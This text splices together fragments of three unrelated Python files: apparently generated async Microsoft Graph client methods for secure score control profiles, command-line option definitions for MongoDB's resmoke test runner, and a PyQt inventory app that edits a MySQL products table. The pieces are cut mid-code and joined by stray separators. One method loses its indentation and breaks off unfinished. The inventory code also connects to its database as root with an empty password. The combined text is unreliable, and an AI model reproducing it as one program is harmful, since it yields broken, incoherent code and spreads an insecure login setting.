    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphSecureScoreControlProfile, or the result of cls(response)
    :rtype: ~security.models.MicrosoftGraphSecureScoreControlProfile
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphSecureScoreControlProfile"]
    # map well-known HTTP status codes to azure-core exception types
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self.create_secure_score_control_profiles.metadata['url']  # type: ignore

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # serialize the model into the POST body
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(body, 'MicrosoftGraphSecureScoreControlProfile')
    body_content_kwargs['content'] = body_content
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # service returns 201 Created on success; anything else is an error
    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphSecureScoreControlProfile', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
create_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles'}  # type: ignore
async def get_secure_score_control_profiles(
    self,
    secure_score_control_profile_id: str,
    select: Optional[List[Union[str, "models.Enum22"]]] = None,
    expand: Optional[List[str]] = None,
    **kwargs
) -> "models.MicrosoftGraphSecureScoreControlProfile":
    """Get secureScoreControlProfiles from Security.

    Get secureScoreControlProfiles from Security.

    :param secure_score_control_profile_id: key: id of secureScoreControlProfile.
    :type secure_score_control_profile_id: str
    :param select: Select properties to be returned.
    :type select: list[str or ~security.models.Enum22]
    :param expand: Expand related entities.
    :type expand: list[str]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphSecureScoreControlProfile, or the result of cls(response)
    :rtype: ~security.models.MicrosoftGraphSecureScoreControlProfile
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphSecureScoreControlProfile"]
    # map well-known HTTP status codes to azure-core exception types
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Construct URL: substitute the profile id into the path template
    url = self.get_secure_score_control_profiles.metadata['url']  # type: ignore
    path_format_arguments = {
        'secureScoreControlProfile-id': self._serialize.url("secure_score_control_profile_id", secure_score_control_profile_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters ($select / $expand OData options)
    query_parameters = {}  # type: Dict[str, Any]
    if select is not None:
        query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # only 200 OK is a success for this GET
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphSecureScoreControlProfile', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
get_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles/{secureScoreControlProfile-id}'}  # type: ignore
async def update_secure_score_control_profiles(
    self,
    secure_score_control_profile_id: str,
    body: "models.MicrosoftGraphSecureScoreControlProfile",
    **kwargs
) -> None:
    """Update the navigation property secureScoreControlProfiles in Security.

    Issues a PATCH against the Graph endpoint for one secure-score
    control profile; a successful update returns no body (204).

    :param secure_score_control_profile_id: key: id of secureScoreControlProfile.
    :type secure_score_control_profile_id: str
    :param body: New navigation property values.
    :type body: ~security.models.MicrosoftGraphSecureScoreControlProfile
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Status codes that map to specific azure-core exception types; callers
    # may extend/override the mapping via the ``error_map`` keyword.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL from the operation's metadata template.
    url = self.update_secure_score_control_profiles.metadata['url']  # type: ignore
    path_format_arguments = {
        'secureScoreControlProfile-id': self._serialize.url("secure_score_control_profile_id", secure_score_control_profile_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters (this operation takes no query parameters).
    query_parameters = {}  # type: Dict[str, Any]

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the request body and send the PATCH through the pipeline.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(body, 'MicrosoftGraphSecureScoreControlProfile')
    body_content_kwargs['content'] = body_content
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Only 204 (No Content) is a success for this operation.
    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
update_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles/{secureScoreControlProfile-id}'}  # type: ignore
async def delete_secure_score_control_profiles(
    self,
    secure_score_control_profile_id: str,
    if_match: Optional[str] = None,
    **kwargs
) -> None:
    """Delete navigation property secureScoreControlProfiles for Security.

    Sends a DELETE for one secure-score control profile, optionally
    conditioned on an ETag via ``If-Match``.

    :param secure_score_control_profile_id: key: id of secureScoreControlProfile.
    :type secure_score_control_profile_id: str
    :param if_match: ETag.
    :type if_match: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Expand the metadata URL template with the serialized path argument.
    path_args = {
        'secureScoreControlProfile-id': self._serialize.url(
            "secure_score_control_profile_id", secure_score_control_profile_id, 'str'),
    }
    request_url = self._client.format_url(
        self.delete_secure_score_control_profiles.metadata['url'],  # type: ignore
        **path_args)

    # No query parameters for this operation.
    query_params = {}  # type: Dict[str, Any]

    # Headers: If-Match is only sent when the caller supplied an ETag.
    headers = {}  # type: Dict[str, Any]
    if if_match is not None:
        headers['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    headers['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.delete(request_url, query_params, headers)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Anything other than 204 (No Content) is an error.
    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles/{secureScoreControlProfile-id}'}  # type: ignore
def list_secure_scores(
self,
orderby: Optional[List[Union[str, "models.Enum23"]]] = None,
select: Optional[List[Union[str, "models.Enum24"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfSecureScore"]:
"""Get secureScores from Security.
Get secureScores from Security.
:param orderby: Order items by property values.
:type orderby: list[str or ~security.models.Enum23]
:param select: Select properties to be returned.
:type select: list[str or ~security.models.Enum24]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfSecureScore or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~security.models.CollectionOfSecureScore]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfSecureScore"]
error_map = {
401: ClientAuthenticationError, 404: | |
"--backupOnRestartDir", action="store", type=str, dest="backup_on_restart_dir",
metavar="DIRECTORY", help=
"Every time a mongod restarts on existing data files, the data files will be backed up underneath the input directory."
)
parser.add_argument(
"--replayFile", action="store", type=str, dest="replay_file", metavar="FILE", help=
"Run the tests listed in the input file. This is an alternative to passing test files as positional arguments on the command line. Each line in the file must be a path to a test file relative to the current working directory. A short-hand for `resmoke run --replay_file foo` is `resmoke run @foo`."
)
parser.add_argument(
"--mrlog", action="store_const", const="mrlog", dest="mrlog", help=
"Pipe output through the `mrlog` binary for converting logv2 logs to human readable logs."
)
parser.add_argument(
"--userFriendlyOutput", action="store", type=str, dest="user_friendly_output",
metavar="FILE", help=
"Have resmoke redirect all output to FILE. Additionally, stdout will contain lines that typically indicate that the test is making progress, or an error has happened. If `mrlog` is in the path it will be used. `tee` and `egrep` must be in the path."
)
parser.add_argument(
"--runAllFeatureFlagTests", dest="run_all_feature_flag_tests", action="store_true",
help=
"Run MongoDB servers with all feature flags enabled and only run tests tags with these feature flags"
)
parser.add_argument(
"--runAllFeatureFlagsNoTests", dest="run_all_feature_flags_no_tests",
action="store_true", help=
"Run MongoDB servers with all feature flags enabled but don't run any tests tagged with these feature flags; used for multiversion suites"
)
parser.add_argument("--additionalFeatureFlags", dest="additional_feature_flags",
action="append", metavar="featureFlag1, featureFlag2, ...",
help="Additional feature flags")
parser.add_argument("--maxTestQueueSize", type=int, dest="max_test_queue_size",
help=argparse.SUPPRESS)
mongodb_server_options = parser.add_argument_group(
title=_MONGODB_SERVER_OPTIONS_TITLE,
description=("Options related to starting a MongoDB cluster that are forwarded from"
" resmoke.py to the fixture."))
mongodb_server_options.add_argument(
"--mongod", dest="mongod_executable", metavar="PATH",
help="The path to the mongod executable for resmoke.py to use.")
mongodb_server_options.add_argument(
"--mongos", dest="mongos_executable", metavar="PATH",
help="The path to the mongos executable for resmoke.py to use.")
mongodb_server_options.add_argument(
"--mongodSetParameters", dest="mongod_set_parameters", action="append",
metavar="{key1: value1, key2: value2, ..., keyN: valueN}",
help=("Passes one or more --setParameter options to all mongod processes"
" started by resmoke.py. The argument is specified as bracketed YAML -"
" i.e. JSON with support for single quoted and unquoted keys."))
mongodb_server_options.add_argument(
"--mongosSetParameters", dest="mongos_set_parameters", action="append",
metavar="{key1: value1, key2: value2, ..., keyN: valueN}",
help=("Passes one or more --setParameter options to all mongos processes"
" started by resmoke.py. The argument is specified as bracketed YAML -"
" i.e. JSON with support for single quoted and unquoted keys."))
mongodb_server_options.add_argument(
"--dbpathPrefix", dest="dbpath_prefix", metavar="PATH",
help=("The directory which will contain the dbpaths of any mongod's started"
" by resmoke.py or the tests themselves."))
mongodb_server_options.add_argument(
"--majorityReadConcern", action="store", dest="majority_read_concern", choices=("on",
"off"),
metavar="ON|OFF", help=("Enable or disable majority read concern support."
" Defaults to %(default)s."))
mongodb_server_options.add_argument("--flowControl", action="store", dest="flow_control",
choices=("on", "off"), metavar="ON|OFF",
help=("Enable or disable flow control."))
mongodb_server_options.add_argument("--flowControlTicketOverride", type=int, action="store",
dest="flow_control_tickets", metavar="TICKET_OVERRIDE",
help=("Number of tickets available for flow control."))
mongodb_server_options.add_argument("--storageEngine", dest="storage_engine",
metavar="ENGINE",
help="The storage engine used by dbtests and jstests.")
mongodb_server_options.add_argument(
"--storageEngineCacheSizeGB", dest="storage_engine_cache_size_gb", metavar="CONFIG",
help="Sets the storage engine cache size configuration"
" setting for all mongod's.")
mongodb_server_options.add_argument(
"--numReplSetNodes", type=int, dest="num_replset_nodes", metavar="N",
help="The number of nodes to initialize per ReplicaSetFixture. This is also "
"used to indicate the number of replica set members per shard in a "
"ShardedClusterFixture.")
mongodb_server_options.add_argument(
"--numShards", type=int, dest="num_shards", metavar="N",
help="The number of shards to use in a ShardedClusterFixture.")
mongodb_server_options.add_argument(
"--wiredTigerCollectionConfigString", dest="wt_coll_config", metavar="CONFIG",
help="Sets the WiredTiger collection configuration setting for all mongod's.")
mongodb_server_options.add_argument(
"--wiredTigerEngineConfigString", dest="wt_engine_config", metavar="CONFIG",
help="Sets the WiredTiger engine configuration setting for all mongod's.")
mongodb_server_options.add_argument(
"--wiredTigerIndexConfigString", dest="wt_index_config", metavar="CONFIG",
help="Sets the WiredTiger index configuration setting for all mongod's.")
mongodb_server_options.add_argument("--transportLayer", dest="transport_layer",
metavar="TRANSPORT",
help="The transport layer used by jstests")
mongodb_server_options.add_argument(
"--fuzzMongodConfigs", dest="fuzz_mongod_configs", action="store_true",
help="Will randomly choose storage configs that were not specified.")
mongodb_server_options.add_argument("--configFuzzSeed", dest="config_fuzz_seed",
metavar="PATH",
help="Sets the seed used by storage config fuzzer")
internal_options = parser.add_argument_group(
title=_INTERNAL_OPTIONS_TITLE,
description=("Internal options for advanced users and resmoke developers."
" These are not meant to be invoked when running resmoke locally."))
internal_options.add_argument(
"--log", dest="logger_file", metavar="LOGGER",
help=("A YAML file that specifies the logging configuration. If the file is"
" located in the resmokeconfig/suites/ directory, then the basename"
" without the .yml extension can be specified, e.g. 'console'."))
# Used for testing resmoke.
#
# `is_inner_level`:
# Marks the resmoke process as a child of a parent resmoke process, meaning that
# it was started by a shell process which itself was started by a top-level
# resmoke process. This is used to ensure the hang-analyzer is called properly.
#
# `test_archival`:
# Allows unit testing of resmoke's archival feature where we write out the names
# of the files to be archived, instead of doing the actual archival, which can
# be time and resource intensive.
#
# `test_analysis`:
# When specified, the hang-analyzer writes out the pids it will analyze without
# actually running analysis, which can be time and resource intensive.
internal_options.add_argument("--internalParam", action="append", dest="internal_params",
help=argparse.SUPPRESS)
internal_options.add_argument("--perfReportFile", dest="perf_report_file",
metavar="PERF_REPORT",
help="Writes a JSON file with performance test results.")
internal_options.add_argument("--cedarReportFile", dest="cedar_report_file",
metavar="CEDAR_REPORT",
help="Writes a JSON file with performance test results.")
internal_options.add_argument(
"--reportFailureStatus", action="store", dest="report_failure_status",
choices=("fail", "silentfail"), metavar="STATUS",
help="Controls if the test failure status should be reported as failed"
" or be silently ignored (STATUS=silentfail). Dynamic test failures will"
" never be silently ignored. Defaults to STATUS=%(default)s.")
internal_options.add_argument(
"--reportFile", dest="report_file", metavar="REPORT",
help="Writes a JSON file with test status and timing information.")
internal_options.add_argument(
"--staggerJobs", action="store", dest="stagger_jobs", choices=("on", "off"),
metavar="ON|OFF", help=("Enables or disables the stagger of launching resmoke jobs."
" Defaults to %(default)s."))
internal_options.add_argument(
"--exportMongodConfig", dest="export_mongod_config", choices=("off", "regular",
"detailed"),
help=("Exports a yaml containing the history of each mongod config option to"
" {nodeName}_config.yml."
" Defaults to 'off'. A 'detailed' export will include locations of accesses."))
evergreen_options = parser.add_argument_group(
title=_EVERGREEN_ARGUMENT_TITLE, description=(
"Options used to propagate information about the Evergreen task running this"
" script."))
evergreen_options.add_argument("--evergreenURL", dest="evergreen_url",
metavar="EVERGREEN_URL",
help=("The URL of the Evergreen service."))
evergreen_options.add_argument(
"--archiveLimitMb", type=int, dest="archive_limit_mb", metavar="ARCHIVE_LIMIT_MB",
help=("Sets the limit (in MB) for archived files to S3. A value of 0"
" indicates there is no limit."))
evergreen_options.add_argument(
"--archiveLimitTests", type=int, dest="archive_limit_tests",
metavar="ARCHIVE_LIMIT_TESTS",
help=("Sets the maximum number of tests to archive to S3. A value"
" of 0 indicates there is no limit."))
evergreen_options.add_argument("--buildId", dest="build_id", metavar="BUILD_ID",
help="Sets the build ID of the task.")
evergreen_options.add_argument("--buildloggerUrl", action="store", dest="buildlogger_url",
metavar="URL",
help="The root url of the buildlogger server.")
evergreen_options.add_argument(
"--distroId", dest="distro_id", metavar="DISTRO_ID",
help=("Sets the identifier for the Evergreen distro running the"
" tests."))
evergreen_options.add_argument(
"--executionNumber", type=int, dest="execution_number", metavar="EXECUTION_NUMBER",
help=("Sets the number for the Evergreen execution running the"
" tests."))
evergreen_options.add_argument(
"--gitRevision", dest="git_revision", metavar="GIT_REVISION",
help=("Sets the git revision for the Evergreen task running the"
" tests."))
# We intentionally avoid adding a new command line option that starts with --suite so it doesn't
# become ambiguous with the --suites option and break how engineers run resmoke.py locally.
evergreen_options.add_argument(
"--originSuite", dest="origin_suite", metavar="SUITE",
help=("Indicates the name of the test suite prior to the"
" evergreen_generate_resmoke_tasks.py script splitting it"
" up."))
evergreen_options.add_argument(
"--patchBuild", action="store_true", dest="patch_build",
help=("Indicates that the Evergreen task running the tests is a"
" patch build."))
evergreen_options.add_argument(
"--projectName", dest="project_name", metavar="PROJECT_NAME",
help=("Sets the name of the Evergreen project running the tests."))
evergreen_options.add_argument("--revisionOrderId", dest="revision_order_id",
metavar="REVISION_ORDER_ID",
help="Sets the chronological order number of this commit.")
evergreen_options.add_argument("--tagFile", action="append", dest="tag_files",
metavar="TAG_FILES",
help="One or more YAML files that associate tests and tags.")
evergreen_options.add_argument(
"--taskName", dest="task_name", metavar="TASK_NAME",
help="Sets the name of the Evergreen task running the tests.")
evergreen_options.add_argument("--taskId", dest="task_id", metavar="TASK_ID",
help="Sets the Id of the Evergreen task running the tests.")
evergreen_options.add_argument(
"--variantName", dest="variant_name", metavar="VARIANT_NAME",
help=("Sets the name of the Evergreen build variant running the"
" tests."))
evergreen_options.add_argument("--versionId", dest="version_id", metavar="VERSION_ID",
help="Sets the version ID of the task.")
benchmark_options = parser.add_argument_group(
title=_BENCHMARK_ARGUMENT_TITLE,
description="Options for running Benchmark/Benchrun tests")
benchmark_options.add_argument("--benchmarkFilter", type=str, dest="benchmark_filter",
metavar="BENCHMARK_FILTER",
help="Regex to filter Google benchmark tests to run.")
benchmark_options.add_argument(
"--benchmarkListTests",
dest="benchmark_list_tests",
action="store_true",
# metavar="BENCHMARK_LIST_TESTS",
help=("Lists all Google benchmark test configurations in each"
" test file."))
benchmark_min_time_help = (
"Minimum time to run each benchmark/benchrun test for. Use this option instead of "
"--benchmarkRepetitions to make a test run for a longer or shorter duration.")
benchmark_options.add_argument("--benchmarkMinTimeSecs", type=int,
dest="benchmark_min_time_secs", metavar="BENCHMARK_MIN_TIME",
help=benchmark_min_time_help)
benchmark_repetitions_help = (
"Set --benchmarkRepetitions=1 if you'd like to run the benchmark/benchrun tests only once."
" By default, each test is run multiple times to provide statistics on the variance"
| |
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.updatedvaluebox.move(395, 345)
self.updatedvaluebox.resize(150, 20)
self.updatedvaluebox.setMaxLength(15)
self.updatedvaluebox.setValidator(QIntValidator())
self.updatedvaluebox.setMaxLength(0)
self.updatebutton = QPushButton('Update', self)
self.updatebutton.setStyleSheet("QPushButton{ border: 2px solid #e6e6ff; border-radius: 10px;"
"color: #ffccdd;"
"background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #e60000, stop: 1 #EA485F);"
"min-width: 80px;}"
)
self.updatebutton.move(430, 375)
self.updatebutton.setEnabled(False)
self.updatebutton.clicked.connect(self.Update)
# ----DELETE LABEL -----------------
self.deletelabel = QLabel('Delete Products', self)
self.deletelabel.setStyleSheet("QLabel{"
"font: 15pt Doppio One;"
"color: #ffffff;}"
);
self.deletelabel.move(575, 175)
self.deleteprodlabel = QLabel('Product Code: ', self)
self.deleteprodlabel.setStyleSheet("QLabel{"
"font: 10pt Doppio One;"
"color: #ffffff;}"
);
self.deleteprodlabel.move(570, 220)
self.deleteprodbox = QLineEdit(self)
self.deleteprodbox.setStyleSheet("QLineEdit{ "
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.deleteprodbox.move(570, 245)
self.deleteprodbox.resize(150, 20)
self.deleteprodbox.setMaxLength(15)
self.deletebutton = QPushButton('Delete', self)
self.deletebutton.setStyleSheet("QPushButton{ border: 2px solid #e6e6ff; border-radius: 10px;"
"color: #ffccdd;"
"background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #e60000, stop: 1 #EA485F);"
"min-width: 80px;}"
)
self.deletebutton.move(600, 275)
self.deletebutton.clicked.connect(self.Delete)
# Upperusernametext---------------------
self.createlabel = QLabel('Hello, {}!'.format(loginaccount), self)
self.createlabel.setStyleSheet("QLabel{"
"font: 25pt Doppio One;"
"color: #ffffff;}"
);
self.createlabel.move(285, 50)
self.show()
# ----------------------------------------
# ----------------------END OF --- INSIDE FRAME CONTENTS--CRUD--------------------------------------------
# ----------------------Function for Adding Products to the Database--------------------------------------
def Add(self):
    """Insert a new product into the ``products`` table.

    Reads the four form fields; refuses blank fields and duplicate
    product codes, otherwise inserts the row and confirms via a dialog.
    Fixes from the previous version: the success dialog no longer
    carries the error title "Cannot add the product", the redundant
    second connection is gone, and the connection is always closed.
    """
    def notify(text, title):
        # Keep a reference on self so the non-modal dialog is not
        # garbage-collected while shown (matches existing behavior).
        self.msgbox = QMessageBox()
        self.msgbox.setIcon(QMessageBox.Information)
        self.msgbox.setText(text)
        self.msgbox.setWindowTitle(title)
        self.msgbox.show()

    product_code = self.prodcodebox.text()
    product_name = self.prodnamebox.text()
    product_qty = self.prodqtybox.text()
    product_price = self.prodpricebox.text()

    # Reject the submission as soon as any field is blank.
    if not all((product_code, product_name, product_qty, product_price)):
        notify("Do not leave an empty field", "Cannot add the product")
        return

    connection = pymysql.connect(host='localhost',
                                 user='root',
                                 password='',
                                 db='danasdb',
                                 charset='utf8mb4',
                                 cursorclass=pymysql.cursors.DictCursor,
                                 port=3306)
    try:
        with connection.cursor() as cursor:
            # execute() returns the number of matching rows.
            exists = cursor.execute(
                'select * from products where product_code = %s;', (product_code,))
            if exists:
                notify("Product already exist!", "Cannot add the product")
                return
            # QIntValidator guarantees qty/price are digit strings here.
            cursor.execute('insert into products values(%s,%s,%s,%s);',
                           (product_code, product_name,
                            int(product_qty), int(product_price)))
        connection.commit()
    finally:
        connection.close()
    notify("Successfully added", "Product added")
# ----------------------Function for Viewing Products to the Database----------------------
def addproducts(self):
    # Open the standalone "Add Products" window. The reference is stored
    # on self so the window is not garbage-collected while displayed.
    self.newWindow = Addproducts()
    self.newWindow.show()
def View(self):
    # Open the product-list window. As with addproducts(), keeping the
    # reference on self prevents premature garbage collection.
    self.newWindow = Viewproducts()
    self.newWindow.show()
# -----------------------Function for Updating Products to the Database----------------------
def UpdatedValue(self, index):
    """Slot for the update-field combo box.

    Records the chosen field in the module-level ``UpdateSelect`` (read
    later by Update) and configures the value box: disabled for the
    placeholder, free text for the name, digits-only for price/quantity.
    """
    global UpdateSelect
    UpdateSelect = self.selectupdatebox.itemText(index)
    value_box = self.updatedvaluebox
    if UpdateSelect == '...':
        # Placeholder entry: nothing to edit yet.
        self.updatebutton.setEnabled(False)
        value_box.clear()
        value_box.setMaxLength(0)
    elif UpdateSelect == 'Product Name':
        self.updatebutton.setEnabled(True)
        value_box.clear()
        value_box.setMaxLength(25)
        value_box.setValidator(None)
    elif UpdateSelect in ('Price', 'Quantity'):
        self.updatebutton.setEnabled(True)
        value_box.clear()
        value_box.setMaxLength(4)
        value_box.setValidator(QIntValidator())
def Update(self):
    """Update one column of an existing product row.

    The column is chosen via the module-level ``UpdateSelect`` (set by
    UpdatedValue). Fixes from the previous version: the three duplicated
    branch bodies are collapsed into a column map, the redundant second
    connection is gone, and the connection is always closed.
    """
    def notify(text, title):
        # Keep a reference on self so the non-modal dialog stays alive.
        self.msgbox = QMessageBox()
        self.msgbox.setIcon(QMessageBox.Information)
        self.msgbox.setText(text)
        self.msgbox.setWindowTitle(title)
        self.msgbox.show()

    product_code = self.updateprodbox.text()
    new_value = self.updatedvaluebox.text()
    if not product_code or not new_value:
        notify("Empty field", "Cannot update the product")
        return

    # Combo-box label -> (column name, value coercion). Numeric columns
    # are stored as ints, matching the insert path.
    columns = {
        'Quantity': ('product_qty', int),
        'Product Name': ('product_name', str),
        'Price': ('product_price', int),
    }

    connection = pymysql.connect(host='localhost',
                                 user='root',
                                 password='',
                                 db='danasdb',
                                 charset='utf8mb4',
                                 cursorclass=pymysql.cursors.DictCursor,
                                 port=3306)
    try:
        with connection.cursor() as cursor:
            found = cursor.execute(
                'select * from products where product_code = %s;', (product_code,))
            if not found:
                notify("Product not found!", "Cannot update the product")
                return
            if UpdateSelect not in columns:
                # Placeholder '...' never reaches here (button disabled),
                # but mirror the old code's silent no-op just in case.
                return
            column, convert = columns[UpdateSelect]
            # Column name comes from the fixed map above, never from user
            # input, so interpolating it into the SQL is safe.
            cursor.execute(
                'update products set {} = %s where product_code = %s'.format(column),
                (convert(new_value), product_code))
        connection.commit()
    finally:
        connection.close()
    notify("Updated Successfully", "Congrats!")
# -----------------------END OF Function for Updating Products to the Database----------------------
# ----------------------Function for Deleting Products to the Database----------------------
def Delete(self):
    """Delete the product row identified by the product-code field.

    Fixes from the previous version: the "empyty" typo and the wrong
    dialog titles ("Cannot add the product" on a delete), the dead
    ``NotBlank`` flag, the redundant second connection, and the
    never-closed connections.
    """
    def notify(text, title):
        # Keep a reference on self so the non-modal dialog stays alive.
        self.msgbox = QMessageBox()
        self.msgbox.setIcon(QMessageBox.Information)
        self.msgbox.setText(text)
        self.msgbox.setWindowTitle(title)
        self.msgbox.show()

    product_code = self.deleteprodbox.text()
    if not product_code:
        notify("Do not leave an empty field", "Cannot delete the product")
        return

    connection = pymysql.connect(host='localhost',
                                 user='root',
                                 password='',
                                 db='danasdb',
                                 charset='utf8mb4',
                                 cursorclass=pymysql.cursors.DictCursor,
                                 port=3306)
    try:
        with connection.cursor() as cursor:
            found = cursor.execute(
                'select * from products where product_code = %s;', (product_code,))
            if not found:
                notify("Product not found!", "Cannot delete the product")
                return
            cursor.execute(
                'DELETE from products where product_code = %s;', (product_code,))
        connection.commit()
    finally:
        connection.close()
class Addproducts(QWidget):
    """Standalone window with a form for inserting a product row.

    Fixes from the previous version: the success dialog no longer
    carries the error title "Cannot add the product", the per-widget
    stylesheet copies are deduplicated into class constants, the
    redundant second DB connection is gone, and connections are closed.
    """

    # Shared stylesheets, previously copy-pasted onto every widget.
    _LABEL_STYLE = ("QLabel{"
                    "font: 10pt Doppio One;"
                    "color: #ffffff;}")
    _EDIT_STYLE = ("QLineEdit{ "
                   "border: 2px white;"
                   "border-radius: 5px;"
                   "padding: 0 8px;"
                   "font-size: 12px;}"
                   "QLineEdit:focus { "
                   "background-color:rgb(0 0, 0,0);}")
    _BUTTON_STYLE = ("QPushButton{ border: 2px solid #e6e6ff; border-radius: 10px;"
                     "color: #ffccdd;"
                     "background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #e60000, stop: 1 #EA485F);"
                     "min-width: 80px;}")

    def __init__(self):
        super().__init__()
        self.title = 'DANAS-INVENTORY'  # Window title
        self.initUI()

    def _make_field(self, caption, x, y, numeric=False):
        """Create a caption label at (x, y) and a styled line edit 25px below.

        Returns (label, line_edit); numeric fields get an int validator.
        """
        label = QLabel(caption, self)
        label.setStyleSheet(self._LABEL_STYLE)
        label.move(x, y)
        box = QLineEdit(self)
        box.setStyleSheet(self._EDIT_STYLE)
        box.move(x, y + 25)
        box.resize(150, 20)
        box.setMaxLength(15)
        if numeric:
            box.setValidator(QIntValidator())
        return label, box

    def _notify(self, text, title):
        """Show an information dialog; the reference on self keeps it alive."""
        self.msgbox = QMessageBox()
        self.msgbox.setIcon(QMessageBox.Information)
        self.msgbox.setText(text)
        self.msgbox.setWindowTitle(title)
        self.msgbox.show()

    def initUI(self):
        """Build the window chrome, background image, and the add-product form."""
        self.setWindowTitle(self.title)
        self.setGeometry(260, 100, 795, 525)  # Window size
        # One font rule for every button/label/line edit in this window.
        self.setStyleSheet('QPushButton,QLabel,QLineEdit {font: 10pt Doppio One}')
        self.setFixedSize(self.size())
        self.setWindowIcon(QIcon(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winicon.png'))

        # Background image stretched over the whole window.
        self.BackgroundHolder = QLabel(self)
        self.Background = QPixmap(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winbackground.png')
        self.BackgroundHolder.setPixmap(self.Background)
        self.BackgroundHolder.move(0, 0)
        self.BackgroundHolder.resize(795, 525)
        self.BackgroundHolder.setScaledContents(True)

        # Section heading.
        self.createlabel = QLabel('Add Products', self)
        self.createlabel.setStyleSheet("QLabel{"
                                       "font: 15pt Doppio One;"
                                       "color: #ffffff;}")
        self.createlabel.move(60, 175)

